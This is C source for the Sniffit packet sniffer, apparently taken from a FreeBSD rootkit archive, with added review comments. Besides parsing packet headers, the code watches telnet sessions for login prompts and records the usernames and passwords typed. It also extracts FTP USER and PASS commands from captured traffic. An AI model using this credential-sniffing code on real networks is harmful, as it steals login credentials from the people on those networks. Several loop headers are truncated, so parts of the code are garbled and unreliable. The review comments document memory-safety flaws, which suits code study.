 * any other protocol.
 *
 * NOTE(review): no capture length is passed in, so nothing here can verify
 * that the bytes being copied are present in the buffer. IP_len, TCP_len
 * and the total length all come from the packet and are not range-checked.
 * DATA_len is a plain subtraction and can presumably be negative on a
 * malformed packet -- callers should validate it before using it as a size.
 */
int unwrap_packet (const unsigned char *sp, struct unwrap *unwrapped)
{
  struct IP_header IPhead;
  struct TCP_header TCPhead;
  struct ICMP_header ICMPhead;
  struct UDP_header UDPhead;
  int i;

  /* Copy the fixed part of the IP header, skipping the link-layer header. */
  memcpy(&IPhead,(sp+PROTO_HEAD),sizeof(struct IP_header));
                                                 /* IP header Conversion */
  /* Header length in bytes: low nibble of the first byte times four. */
  unwrapped->IP_len = (IPhead.verlen & 0xF) << 2;
  if(NO_CHKSUM == 0)
    {
    /* NOTE(review): sp is declared const but is written through here.
       The checksum bytes are zeroed in the capture buffer itself so the
       header can be summed in place. The mismatch path below returns
       before the buffer is restored from IPhead. */
    sp[PROTO_HEAD+10]=0;                /* reset checksum to zero, Q&D way*/
    sp[PROTO_HEAD+11]=0;
    if(in_cksum((sp+PROTO_HEAD),unwrapped->IP_len) != IPhead.checksum)
      {
#ifdef DEBUG_ONSCREEN
      printf("Packet dropped... 
(invalid IP chksum)\n"); printf("%X %X (len %d)\n",in_cksum((sp+PROTO_HEAD),unwrapped->IP_len),IPhead.checksum,unwrapped->IP_len); #endif return NO_IP; } memcpy((sp+PROTO_HEAD),&IPhead,sizeof(struct IP_header)); /* restore orig buffer */ /* general programming rule */ } if(IPhead.protocol == TCP ) /* TCP */ { memcpy(&TCPhead,(sp+PROTO_HEAD+(unwrapped->IP_len)), sizeof(struct TCP_header)); unwrapped->TCP_len = ntohs(TCPhead.offset_flag) & 0xF000; unwrapped->TCP_len >>= 10; unwrapped->DATA_len = ntohs(IPhead.length) - (unwrapped->IP_len) - (unwrapped->TCP_len); return TCP; } if(IPhead.protocol == ICMP ) /* ICMP */ { memcpy(&ICMPhead,(sp+PROTO_HEAD+(unwrapped->IP_len)), sizeof(struct ICMP_header)); unwrapped->ICMP_len = ICMP_HEADLENGTH; unwrapped->DATA_len = ntohs(IPhead.length) - (unwrapped->IP_len) - (unwrapped->ICMP_len); return ICMP; } if(IPhead.protocol == UDP ) /* UDP */ { memcpy(&UDPhead,(sp+PROTO_HEAD+(unwrapped->IP_len)), sizeof(struct UDP_header)); unwrapped->UDP_len = UDP_HEADLENGTH; unwrapped->DATA_len = ntohs(IPhead.length) - (unwrapped->IP_len) - (unwrapped->UDP_len); return UDP; } return -1; } fbsdrootkit-1.2/sniffit.0.3.3/sniffit.0.3.3.c100600 764 764 110406 6226213211 15540 0ustar dfdf/* Sniffit -- coded by Brecht Claerhout */ /* Time wasted: too much */ /* formatted code and added support for hostname resolution - Godmar Back */ #include "config.h" /* Config header file */ #include "sn_defines.h" /* Various defines */ #include "sn_global.h" /* some global defs */ #include "sn_oldether.h" /* Leftover from 0.0.X and 0.1.X */ #include "sn_packets.h" /* My own packet structs */ #include "sn_data.h" /* data defs */ #include "sn_logfile.h" #ifdef INCLUDE_INTERFACE #include "sn_interface.h" /* all ncurses stuff */ #endif #include "sn_cfgfile.h" /* Config file handling */ static char Copyright[]= "Sniffit - Brecht Claerhout - Copyright 1996"; void quit (char *prog_name) /* Learn to use the program */ { printf( "usage: %s [-xdabvn] [-P proto] [-A char] [-p 
port]\n" " [-l sniflen] [-L loglevel] [-F snifdevice]\n" #ifdef INCLUDE_INTERFACE " [-D tty]" " (-t | -s)" " | -i | -c\n", #else " (-t | -s) | -c\n", #endif prog_name); exit(0); } void my_exit (void) { exit(0);}; /* DEBUGGING INFO */ #ifdef DEBUG void close_debug_device (void) { fclose(debug_dev); } void debug_msg(char *debug_text) { fprintf(debug_dev,"%s (%d)\n",debug_text,debug_cnt); debug_cnt++; } #endif char *strlower (char *string) { int i; for(i=0;i=MAXCOUNT) { /* remove less effective connection from list */ search_pointer=start_dynam; dummy_pointer=start_dynam; do { if(search_pointer->time_out > last_time_out) {last_time_out=search_pointer->time_out; dummy_pointer=search_pointer;} search_pointer=search_pointer->next; } while(search_pointer != NULL); #ifdef DEBUG debug_msg("Auto timeout engaged (filename follows)"); debug_msg(dummy_pointer->filename); #endif if(dummy_pointer->f==NULL) delete_dynam(dummy_pointer->filename,dummy_pointer->proto,0); else delete_dynam(dummy_pointer->filename,dummy_pointer->proto,1); printf("Too many connections... 
auto timeout\n");
    }

  /* Tail of add_dynam(): allocate and initialise a new connection record,
     then append it to the singly linked list rooted at start_dynam. */

  /* Allocation failure is fatal: a message is printed and the process
     exits (with status 0). */
  if( (dummy_pointer=(struct file_info *)malloc(sizeof(struct file_info))) == NULL)
    {printf("Couldn't allocate memory.\n"); exit(0);};
  dummy_pointer->bytes=0;
  dummy_pointer->proto=ptype;
  /* NOTE(review): strcpy() does not bound the copy. The size of the
     filename member is declared outside this file section -- confirm that
     every caller passes a name that fits. */
  strcpy(dummy_pointer->filename,file);
  if(do_file!=0)
    {
    /* One append-mode log file per record, named after the connection. */
    f = fopen(file,"a");
    if(f==NULL) perror("Couldn't open logfile:"),exit(0);
    dummy_pointer->f=f;
    }
  else
    {
    dummy_pointer->f=NULL;
    }
  dummy_pointer->next=NULL;
  dummy_pointer->buffer=NULL;
  dummy_pointer->log=0;
  /* Sequence number expected on the next segment of this connection. */
  dummy_pointer->exp_seq=cur_seq+len;
  /* NOTE(review): the loop header on the next statement is damaged in this
     copy of the file (the text after "i" appears to have been lost);
     presumably it fills scroll_buf with spaces -- confirm against an intact
     copy before relying on it. */
  for(i=0;iscroll_buf[i]=' ';
  dummy_pointer->scroll_buf[SCBUF]=0;
  /* NOTE(review): time_out is not assigned in this initialisation, yet
     search_dynam() increments it on every node; until the record is first
     matched the counter starts from whatever malloc() returned. */

  /* Append at the tail (walks the whole list). */
  if(start_dynam==NULL)
    start_dynam=dummy_pointer;
  else
    {
    search_pointer=start_dynam;
    while(search_pointer->next != NULL)
      search_pointer=search_pointer->next;
    search_pointer->next=dummy_pointer;
    }
  dynam_len++;
  return dummy_pointer;
}

/*
 * delete_dynam - unlink the list entry whose filename and proto both match.
 *
 * file:    compared with strcmp() against each entry's filename
 * ptype:   compared against each entry's proto
 * do_file: when non-zero, the entry's FILE is fclose()d before unlinking
 *
 * Does nothing when the list is empty or no entry matches. Only the first
 * matching entry is removed.
 */
void delete_dynam (char *file, char ptype,char do_file)
{
  struct file_info *search_pointer;
  struct file_info *dummy_pointer;

  if(start_dynam==NULL) return;

  /* Case 1: the head of the list matches. */
  search_pointer=start_dynam;
  if( (strcmp(search_pointer->filename,file)==0) && (search_pointer->proto==ptype))
    {
    if(do_file!=0) fclose(search_pointer->f);
    /* NOTE(review): unlike the branch below, this path never free()s the
       node or its buffer, so removing the head entry leaks both. */
    start_dynam=search_pointer->next;
    dynam_len--;
    return;
    }

  /* Case 2: look one node ahead so the predecessor can be relinked. */
  search_pointer=start_dynam;
  if(search_pointer->next==NULL) return;
  while(search_pointer->next != NULL)
    {
    if( (strcmp(search_pointer->next->filename,file)==0) && (search_pointer->next->proto==ptype))
      {
      if(do_file!=0) fclose(search_pointer->next->f);
      dummy_pointer=search_pointer->next;
      search_pointer->next=search_pointer->next->next;
      if(dummy_pointer->buffer!=NULL) free(dummy_pointer->buffer);
      free(dummy_pointer);
      dynam_len--;
      return;
      }
    search_pointer=search_pointer->next;
    }
}

/*
 * search_dynam - find the list entry matching file and ptype.
 *
 * Every call first adds 1 to time_out on every entry in the list, then
 * searches. Returns NULL on failure (empty list or no match).
 */
struct file_info *search_dynam(char *file, char ptype)
{
  struct file_info *search_pointer;

  if(start_dynam==NULL) return NULL;

  search_pointer=start_dynam;              /* time_out add */
  do
    {
    search_pointer->time_out += 1;
    search_pointer=search_pointer->next;
    }
  while(search_pointer != NULL);

  search_pointer=start_dynam;              /* actual search */ 
do
  {
  if( (strcmp(search_pointer->filename,file)==0) && (search_pointer->proto==ptype))
    {search_pointer->time_out=0;              /* timeout reset */
     return search_pointer;}
  search_pointer=search_pointer->next;
  }
while(search_pointer != NULL);
return NULL;                                  /* no entry matched */
}

/*
 * record_buf - append in-sequence payload bytes to dummy_pointer->buffer.
 *
 * dummy_pointer: connection record; its buffer, bytes and log members are
 *                updated
 * cur_seq_nr:    sequence number of this segment; the call is a no-op
 *                unless it equals dummy_pointer->exp_seq
 * data, len:     payload bytes and their count
 * type:          0 is handled as TELNET (a TELNET_ENTER byte increments
 *                log and stops the copy); other values have no special case
 *
 * Non-printable bytes are stored as '~'. The buffer is kept NUL-terminated.
 */
/* Type 0: TELNET */
void record_buf(struct file_info *dummy_pointer,
                unsigned long cur_seq_nr, char *data, int len, int type)
{
  int i,j,noloop=0;

  /* Out-of-order or retransmitted segment: ignore it. */
  if(dummy_pointer->exp_seq != cur_seq_nr) {return;}
  noloop=0;
  /* NOTE(review): the loop header below is damaged in this copy of the
     file (text after "i" appears to have been lost); presumably it iterates
     i over len and loads j from dummy_pointer->bytes -- confirm against an
     intact copy. */
  for(i=0;ibytes;
    switch(type)
      {
      case 0:
        if(data[i]==TELNET_ENTER)             /* return found */
          {dummy_pointer->log++;noloop=1;};
        break;
      default:
        break;
      }
    if(noloop==1) break;
    /* NOTE(review): this guard still admits j == LOG_PASS_BUF-1, after
       which buffer[j+1] below is index LOG_PASS_BUF. The buffer is
       allocated elsewhere in this file with malloc(LOG_PASS_BUF), so the
       terminator can land one byte past the allocation. */
    if(j>=LOG_PASS_BUF) break;
    /* NOTE(review): data[i] is a plain char; isprint() on a negative char
       value is undefined -- a cast to unsigned char would be the usual form. */
    if(isprint(data[i]))
      {dummy_pointer->buffer[j]=data[i];}
    else
      {dummy_pointer->buffer[j]='~';};
    dummy_pointer->buffer[j+1]=0;
    dummy_pointer->bytes+=1;
    }
#ifdef DEBUG_ONSCREEN
  printf("Record buffer: >%s< (%d)\n",dummy_pointer->buffer,dummy_pointer->bytes);
#endif
}

/*
 * sb_shift - move scroll_buf contents one position towards index 0.
 *
 * NOTE(review): the loop header is damaged in this copy (text after "i"
 * appears lost); the upper bound is presumably SCBUF -- confirm. The local
 * j is declared but not used in the visible code.
 */
void sb_shift(struct file_info *dummy_pointer)
{
  int i,j;

  for(i=1;iscroll_buf[i-1]=dummy_pointer->scroll_buf[i];
}

/*
 * sbuf_update - feed in-sequence payload bytes into the scroll buffer.
 *
 * The call is a no-op unless cur_seq_nr equals dummy_pointer->exp_seq.
 * The visible code writes each byte (or '.' in the else branch) at
 * scroll_buf[SCBUF-1].
 *
 * NOTE(review): the loop header and the condition selecting between the
 * two branches are damaged in this copy; presumably the loop runs over len,
 * shifts the buffer and tests isprint() -- confirm against an intact copy.
 */
void sbuf_update(struct file_info *dummy_pointer,
                 unsigned long cur_seq_nr, char *data, int len)
{
  int i;

  if(dummy_pointer->exp_seq != cur_seq_nr) {return;}
  for(i=0;iscroll_buf[SCBUF-1]=data[i];}
    else
      {dummy_pointer->scroll_buf[SCBUF-1]='.';};
    }
#ifdef DEBUG_ONSCREEN
  printf("scr_buf: %s\n",dummy_pointer->scroll_buf);
#endif
}

/*
 * print_iphead - print selected fields of an IP header to stdout.
 *
 * iphead:        header to print
 * icmp_or_plain: when non-zero, a line is printed first saying the header
 *                is the one an ICMP message refers to
 */
void print_iphead (struct IP_header *iphead, char icmp_or_plain)
{
  int dummy;
  u_char *so,*dest;

  if(icmp_or_plain!=0)
    printf("ICMP message concerned following IP packet:\n");
  /* Addresses are printed byte by byte in the order they sit in memory. */
  so=(u_char *)&(iphead->source);
  dest=(u_char *)&(iphead->destination);
  printf("from %u.%u.%u.%u to %u.%u.%u.%u\n",
         so[0],so[1],so[2],so[3],
         dest[0],dest[1],dest[2],dest[3]);
  /* The type byte shifted right by 5 indexes the precedence name table.
     NOTE(review): the index range depends on the declared width and
     signedness of the type member (declared elsewhere) -- confirm it cannot
     exceed the table. */
  dummy=iphead->type; dummy>>=5;
  printf("IP Packet precedence: %s (%c%c%c)\n",
         IP_TYPE_precedence[dummy],
         (iphead->type&IP_DELAY)?'D':'-',
         (iphead->type&IP_THROUGHPUT)?'T':'-',
         (iphead->type&IP_RELIABILITY)?'R':'-');
  /* Top three bits of the host-order flag/offset word. */
  dummy=ntohs(iphead->flag_offset); dummy>>=13;
  printf("FLAGS: %s %s Time to live 
(secs): %d\n", (dummy&IP_DF)?"DF":"--", (dummy&IP_DELAY)?"MF":"--", iphead->TTL); if(iphead->protocol < 34) printf("Protocol (%d): %s\n",iphead->protocol, IP_PROTOCOL_number[iphead->protocol]); else printf("Protocol (%d) not recognised\n",iphead->protocol); printf("\n"); } int check_packet(u_long ipaddr, const struct packetheader *p_header, const u_char *sp, char *file, char *file2, struct unwrap *info, char *detail, int MODE) /* MODE 0: -t MODE 1: -s */ /* MODE 2: -b */ { u_char *so,*dest; char wc_so[20], wc_dest[20]; struct IP_header iphead; struct TCP_header tcphead; struct ICMP_header icmphead; struct UDP_header udphead; int proto; unsigned int prior; char selected; int i; /* Wildcard stuff */ unsigned char *str_IP; unsigned int n_s; /* strlen short notation for wc bugfix */ proto=unwrap_packet(sp, info); if(proto == NO_IP) return DONT_EXAMINE; /* no use in trying */ memcpy(&iphead,(sp+PROTO_HEAD),sizeof(struct IP_header)); so=(u_char *)&(iphead.source); dest=(u_char *)&(iphead.destination); if((proto==TCP)&&(PROTOCOLS&F_TCP)) { memcpy(&tcphead,(sp+PROTO_HEAD+info->IP_len), sizeof(struct TCP_header)); memcpy(detail,&tcphead,sizeof(struct TCP_header)); if((WILDCARD==0)&&(CFG_FILE==0)) /* Selection criteria */ { if (MODE == DEST && ipaddr != iphead.destination /* -t */ || MODE == SOURCE && ipaddr != iphead.source /* -s */ || MODE == BOTH && ipaddr != iphead.destination /* -b */ && ipaddr != iphead.source ) return DONT_EXAMINE; /* Check destination/source IP */ } else { if (WILDCARD!=0) /* Wildcards */ { sprintf(wc_so,"%u.%u.%u.%u",so[0],so[1],so[2],so[3]); sprintf(wc_dest,"%u.%u.%u.%u",dest[0],dest[1],dest[2],dest[3]); n_s = strlen(IP); if (MODE == DEST && (strncmp(wc_dest,IP,n_s)!=0) /* -t */ || MODE == SOURCE && (strncmp(wc_so,IP,n_s)!=0) /* -s */ || MODE == BOTH && (strncmp(wc_dest,IP,n_s)!=0) /* -b */ && (strncmp(wc_so,IP,n_s)!=0) ) return DONT_EXAMINE; /* Check destination/source IP */ } else { /* We are using the config file (4*Check) */ prior=0; 
selected=0; sprintf(wc_so,"%u.%u.%u.%u",so[0],so[1],so[2],so[3]); sprintf(wc_dest,"%u.%u.%u.%u",dest[0],dest[1],dest[2],dest[3]); #ifdef DEBUG_ONSCREEN printf("CONCERNING: %s %d - %s %d\n",wc_so,ntohs(tcphead.source),wc_dest,ntohs(tcphead.destination)); #endif /* Highest prior last (backward+break for speed) */ for(i=(select_from_length-1);i>=0;i--) { if(prior > select_from_list[i].priority) break; str_IP = select_from_list[i].host; #ifdef DEBUG_ONSCREEN printf("SF: %s %d Prior:%d\n",str_IP,select_from_list[i].port,select_from_list[i].priority); #endif if((select_from_list[i].port==0) || (select_from_list[i].port==ntohs(tcphead.source))) { if(select_from_list[i].wildcard==0) { /* NO wildcard */ if(strcmp(wc_so,str_IP)==0) {selected=1; prior=select_from_list[i].priority; break;} } else { /* wildcard */ if(strncmp(wc_so,str_IP,strlen(str_IP))==0) {selected=1; prior=select_from_list[i].priority; break;} } if(str_IP[0]==0) {selected=1; break;}; } } for(i=(select_to_length-1);i>=0;i--) { if(prior > select_to_list[i].priority) break; str_IP = select_to_list[i].host; #ifdef DEBUG_ONSCREEN printf("ST: %s %d Prior:%d\n",str_IP,select_to_list[i].port,select_to_list[i].priority); #endif if((select_to_list[i].port==0) || (select_to_list[i].port==ntohs(tcphead.destination))) { if(select_to_list[i].wildcard==0) { /* NO wildcard */ if(strcmp(wc_dest,str_IP)==0) {selected=1; prior=select_to_list[i].priority; break;} } else { /* wildcard */ if(strncmp(wc_dest,str_IP,strlen(str_IP))==0) {selected=1; prior=select_to_list[i].priority; break;} } if(str_IP[0]==0) {selected=1; break;}; } } for(i=(deselect_from_length-1);i>=0;i--) { if(prior > deselect_from_list[i].priority) break; str_IP = deselect_from_list[i].host; #ifdef DEBUG_ONSCREEN printf("DF: %s %d Prior:%d\n",str_IP,deselect_from_list[i].port,deselect_from_list[i].priority); #endif if((deselect_from_list[i].port==0) || (deselect_from_list[i].port==ntohs(tcphead.source))) { if(deselect_from_list[i].wildcard==0) { /* NO wildcard 
*/ if(strcmp(wc_so,str_IP)==0) {selected=0; prior=deselect_from_list[i].priority; break;} } else { /* wildcard */ if(strcmp(wc_so,str_IP)==0) {selected=0; prior=deselect_from_list[i].priority; break;} } if(str_IP[0]==0) {selected=0; break;}; } } for(i=(deselect_to_length-1);i>=0;i--) { if(prior > deselect_to_list[i].priority) break; str_IP = deselect_to_list[i].host; #ifdef DEBUG_ONSCREEN printf("DT: %s %d Prior:%d\n",str_IP,deselect_to_list[i].port,deselect_to_list[i].priority); #endif if((deselect_to_list[i].port==0) || (deselect_to_list[i].port==ntohs(tcphead.destination))) { if(deselect_to_list[i].wildcard==0) { /* NO wildcard */ if(strncmp(wc_dest,str_IP,strlen(str_IP))==0) {selected=0; prior=deselect_to_list[i].priority; break;} } else { /* wildcard */ if(strncmp(wc_dest,str_IP,strlen(str_IP))==0) {selected=0; prior=deselect_to_list[i].priority; break;} } if(str_IP[0]==0) {selected=0; break;}; } } #ifdef DEBUG_ONSCREEN printf("Selected: %d\n",selected); #endif if(selected==0) return DONT_EXAMINE; } } if( DEST_PORT && ntohs(tcphead.destination) != DEST_PORT) return DONT_EXAMINE; /* Check dest. PORT */ /* inet_ntoa gave wrong output sometimes */ sprintf(file,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", so[0],so[1],so[2],so[3], (unsigned short)ntohs(tcphead.source), dest[0],dest[1],dest[2],dest[3], (unsigned short)ntohs(tcphead.destination)); sprintf(file2,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", dest[0],dest[1],dest[2],dest[3], (unsigned short)ntohs(tcphead.destination), so[0],so[1],so[2],so[3], (unsigned short)ntohs(tcphead.source)); if ((ntohs(tcphead.offset_flag) & FIN) != 0) /* check for reset conn. */ return TCP_FINISH; /* packet is a FIN */ /* Used to be for speed, '-x' needs all info, so this too! 
if (info->DATA_len == 0) return DONT_EXAMINE; */ return TCP_EXAMINE; /* interprete packet */ }; if((proto==ICMP)&&(PROTOCOLS&F_ICMP)) /* ICMP packet checking */ { memcpy(&icmphead,(sp+PROTO_HEAD+info->IP_len), sizeof(struct ICMP_header)); memcpy(detail,&icmphead,sizeof(struct ICMP_header)); sprintf(file,"%u.%u.%u.%u > %u.%u.%u.%u", so[0],so[1],so[2],so[3], dest[0],dest[1],dest[2],dest[3]); return ICMP_EXAMINE; }; if((proto==UDP)&&(PROTOCOLS&F_UDP)) /* UDP packet checking */ { memcpy(&udphead,(sp+PROTO_HEAD+info->IP_len), sizeof(struct UDP_header)); memcpy(detail,&udphead,sizeof(struct UDP_header)); sprintf(file,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", so[0],so[1],so[2],so[3], ntohs(udphead.source), dest[0],dest[1],dest[2],dest[3], ntohs(udphead.destination)); return UDP_EXAMINE; } return DONT_EXAMINE; } /* Default Processing of packets */ pcap_handler packethandler( u_char *ipaddrpoint, const struct packetheader *p_header, const u_char *sp) { char filename[50], filename2[50],header[SNAPLEN]; FILE *f; struct file_info *dummy_pointer; u_char status=0; char *help; int dummy,finish; /* look out it's signed */ u_long datalen, position, total_length, i, n, ipaddr; struct unwrap info; struct IP_header iphead; struct TCP_header tcphead; struct ICMP_header icmphead; struct IP_header iphead_icmp; struct UDP_header udphead; memcpy(&ipaddr,ipaddrpoint,sizeof(u_long)); finish=check_packet(ipaddr,p_header,sp,filename,filename2,&info,header,SNIFMODE); if(PROTOCOLS & F_IP) memcpy(&iphead,(sp+PROTO_HEAD),sizeof(struct IP_header)), print_iphead(&iphead,0); if(finish==DONT_EXAMINE) return; /* Packet is not for us */ if((DUMPMODE & 32)&&(finish<10)) /* extended info TCP only */ { memcpy(&tcphead,header,sizeof(struct TCP_header)); dummy=ntohs(tcphead.offset_flag); printf("\n"); printf("TCP Packet ID (from_IP.port-to_IP.port): %s\n",filename); printf(" SEQ (hex): %lX ",ntohl(tcphead.seq_nr)); if(dummy&ACK) printf("ACK (hex): %lX\n",ntohl(tcphead.ACK_nr)); printf(" FLAGS: %c%c%c%c%c%c", 
(dummy&URG)?'U':'-',(dummy&ACK)?'A':'-', (dummy&PSH)?'P':'-',(dummy&RST)?'R':'-', (dummy&SYN)?'S':'-',(dummy&FIN)?'F':'-'); if(dummy&ACK) printf(" Window: %X\n",ntohs(tcphead.window)); else printf("\n"); }; if((finish<10)&&(LOGLEVEL==0)) /* TCP packet */ /* I didn't use flags for later extention, and they */ /* don't come in pairs anyhow */ /* use return instead of else {if}, for later extention */ { memcpy(&tcphead,header,sizeof(struct TCP_header)); switch(DUMPMODE & 223) { case 0: /* LOG mode */ status=0; dummy_pointer=search_dynam(filename, TCP); if(dummy_pointer!=NULL) status=1; /* make a new entry unless it's reset */ if(status==0) { if(finish==TCP_FINISH) return; /* there was never data transmitted */ /* seq_nr & datalen not important here yet */ if((dummy_pointer=add_dynam(filename, TCP, 1, 0, 0))==NULL) return; } f=dummy_pointer->f; if(dummy_pointer->bytes<=SNIFLEN) { const u_char *data = sp+PROTO_HEAD+info.IP_len+info.TCP_len; if(SNIFLEN!=0) dummy_pointer->bytes+=info.DATA_len; /* last packet is written */ /* don't care about length */ if(ASC==0) {for(i=0;i 75) n=0, printf("\n"); if(DUMPMODE & 1) n += printf(" %02X",c); if(DUMPMODE & 2) n += printf(" %c",isprint(c)?c:'.'); } printf("\n\n"); break; default: printf("\nImpossible error! Sniffer Hartattack!\n"); exit(0); } return; } if((finish<10)&&(LOGLEVEL!=0)) /* TCP packet - logfile */ /* This mode will grow, so I just copied the other if() */ /* instead of adding a dumpmode, I think this will keep */ /* things more simpel. 
Also I use the smart dynam */ /* managment of connections */ { memcpy(&tcphead,header,sizeof(struct TCP_header)); dummy_pointer=search_dynam(filename, TCP); if(dummy_pointer!=NULL) status=1; /* make a new entry unless it's reset */ if(status==0) { if(finish!=TCP_FINISH) if((dummy_pointer=add_dynam(filename, TCP, 0,ntohl(tcphead.seq_nr),info.DATA_len))==NULL) return; } if(finish==TCP_FINISH) /* let's reset the connection */ {delete_dynam(filename, TCP, 0);} /*** return before using any search or pointer!!!!!!!! ***/ /* Connections with FIN have deleted entries! */ dummy=ntohs(tcphead.offset_flag); if(LOGLEVEL<10) /* Raw logging */ { if(dummy&SYN) print_conn(filename,"Connection initiated. (SYN)"); if(dummy&FIN) print_conn(filename,"Connection ending. (FIN)"); if(dummy&RST) print_conn(filename,"Connection reset. (RST)"); return; } if(LOGLEVEL<30) /* more sophisticated */ { const u_char *data = sp+PROTO_HEAD+info.IP_len+info.TCP_len; if(search_dynam(filename2, TCP)==NULL) { if(dummy&SYN) print_conn(filename,"Connection initiated."); if(dummy&FIN) print_conn(filename2,"Connection closed."); } if(dummy&FIN) return; /* needed, cauz entry don't exist */ if(LOGLEVEL>=12) /* loglevel 12 */ { dummy_pointer=search_dynam(filename, TCP); /* don't forget to check dummy_pointer!!! 
*/ if( (ntohs(tcphead.source) == 23) && (dummy_pointer!=NULL))/* from telnet */ { sbuf_update(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len); /* detect login */ strlower(dummy_pointer->scroll_buf); if((dummy_pointer->log!=99)&&(strstr(dummy_pointer->scroll_buf,"login")!=NULL)) { dummy_pointer->log=99; dummy_pointer=search_dynam(filename2, TCP); if(dummy_pointer!=NULL) {dummy_pointer->log=1; dummy_pointer->bytes=0; dummy_pointer->buffer=malloc(LOG_PASS_BUF); if(dummy_pointer->buffer==NULL) exit(1); dummy_pointer->buffer[0]=0; } else { print_conn(filename2,"Password missed due to overload."); }; #ifdef DEBUG_ONSCREEN printf("Login detected, data initialised.\n"); #endif } } if( (ntohs(tcphead.destination) == 23) && (dummy_pointer!=NULL))/* TO telnet */ { if(dummy_pointer->log==1) /* log login */ { record_buf(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len,0); if(dummy_pointer->log==2) /* login recorded */ { print_login(filename,dummy_pointer->buffer); dummy_pointer->log=3; dummy_pointer->bytes=0; dummy_pointer->buffer[0]=0; } } else { if(dummy_pointer->log==3) /* log pwd */ { record_buf(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len,0); if(dummy_pointer->log==4) /* passwd recorded */ { print_pwd(filename,dummy_pointer->buffer); dummy_pointer->log=0; dummy_pointer->bytes=0; dummy_pointer->buffer[0]=0; } } } } } if( (ntohs(tcphead.destination) == 21) && (dummy_pointer!=NULL))/* to FTP */ { sbuf_update(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len); /* detect USER en PASS */ if((help=strstr(dummy_pointer->scroll_buf,"USER"))!=NULL) { help+=strlen("USER "); for(i=0;iscroll_buf[i]==FTP_ENTER) dummy_pointer->scroll_buf[i]=0; print_ftp_user(filename,help); for(i=0;iscroll_buf[i]=' '; } if((help=strstr(dummy_pointer->scroll_buf,"PASS"))!=NULL) { help+=strlen("PASS "); for(i=0;iscroll_buf[i]==FTP_ENTER) dummy_pointer->scroll_buf[i]=0; print_ftp_pass(filename,help); for(i=0;iscroll_buf[i]=' '; } } if( (dummy_pointer=search_dynam(filename, TCP)) 
!=NULL)
      {
      /* In-order segment: advance the expected sequence number by the
         payload length computed from the packet's own header fields. */
      if(ntohl(tcphead.seq_nr)==dummy_pointer->exp_seq)
        dummy_pointer->exp_seq+=info.DATA_len;
      /* if we miss a packet... no probs seq nr's get updated */
      /* cauz' we can't rely on ACK's from other side         */
      /* it's pretty good this way                            */
      /* NOTE(review): a plain greater-than comparison of sequence numbers
         does not account for wrap-around of the 32-bit sequence space. */
      if(ntohl(tcphead.seq_nr)>dummy_pointer->exp_seq)
        dummy_pointer->exp_seq=ntohl(tcphead.seq_nr)+info.DATA_len;
      }
    return;
    }
  return;                                   /* DON'T FORGET THEM!!!! */
  }

if(finish<20)                               /* ICMP packet */
  {
  memcpy(&icmphead,header,sizeof(struct ICMP_header));
  /* Copy the IP header that follows the ICMP header plus 4 further bytes.
     NOTE(review): this copy is made for every ICMP type, including those
     whose cases below never print it, and no check against the captured
     packet length is visible here -- a short packet would be read past
     its end. */
  memcpy(&iphead_icmp,
         (sp+PROTO_HEAD+info.IP_len+ICMP_HEADLENGTH+4),
         sizeof(struct IP_header));
  printf("ICMP message id: %s\n",filename);
  printf(" ICMP type: ");
  /* NOTE(review): in cases 3, 5 and 11 the code byte taken from the packet
     indexes a name table directly. The table sizes are declared elsewhere
     and no range check is visible here, so an unexpected code value may
     index past the table -- confirm and bound the index. */
  switch(icmphead.type)
    {
    case 0:
      printf("%s\n",ICMP_TYPE_0);
      break;
    case 3:
      printf("%s\n",ICMP_TYPE_3);
      printf(" Error: %s\n",
             ICMP_type_3_code[icmphead.code]);
      print_iphead(&iphead_icmp,1);
      break;
    case 4:
      printf("%s\n",ICMP_TYPE_4);
      print_iphead(&iphead_icmp,1);
      break;
    case 5:
      printf("%s\n",ICMP_TYPE_5);
      printf(" Error: %s\n",
             ICMP_type_5_code[icmphead.code]);
      print_iphead(&iphead_icmp,1);
      break;
    case 8:
      printf("%s\n",ICMP_TYPE_8);
      break;
    case 11:printf("%s\n",ICMP_TYPE_11);
      printf(" Error: %s\n",
             ICMP_type_11_code[icmphead.code]);
      print_iphead(&iphead_icmp,1);
      break;
    case 12:printf("%s\n",ICMP_TYPE_12);
      print_iphead(&iphead_icmp,1);
      break;
    case 13:printf("%s\n",ICMP_TYPE_13);
      break;
    case 14: printf("%s\n",ICMP_TYPE_14);
      break;
    case 15: printf("%s\n",ICMP_TYPE_15);
      break;
    case 16: printf("%s\n",ICMP_TYPE_16);
      break;
    case 17: printf("%s\n",ICMP_TYPE_17);
      break;
    case 18: printf("%s\n",ICMP_TYPE_18);
      break;
    default: printf("Unknown ICMP type!\n");break;
    }
  printf("\n");
  return;
  }

if(finish<30)                               /* nothing yet */
  {
  memcpy(&udphead,header,sizeof(struct UDP_header));
  /* 223 is 0xDF: the mode value with bit 32 (the extended-info flag
     tested earlier in this function) masked off. */
  switch(DUMPMODE & 223)
    {
    case 0: break;
    case 1:                                 /* DUMP mode */
    case 2:
    case 3:
      printf("UDP Packet ID (from_IP.port-to_IP.port): %s\n",filename);
      /* NOTE(review): total_length is the sum of lengths derived from
         header fields; no comparison with the captured length is visible
         here. */
      total_length=info.IP_len+info.UDP_len+info.DATA_len;
      n = 0;
      /* NOTE(review): the loop header below is damaged in this copy of the
         file (text after "i" appears to have been lost); presumably it
         walks total_length bytes and wraps output near column 75 --
         confirm against an intact copy. */
      for(i=0;i 75) n=0, printf("\n");
        if(DUMPMODE & 1) n += printf(" 
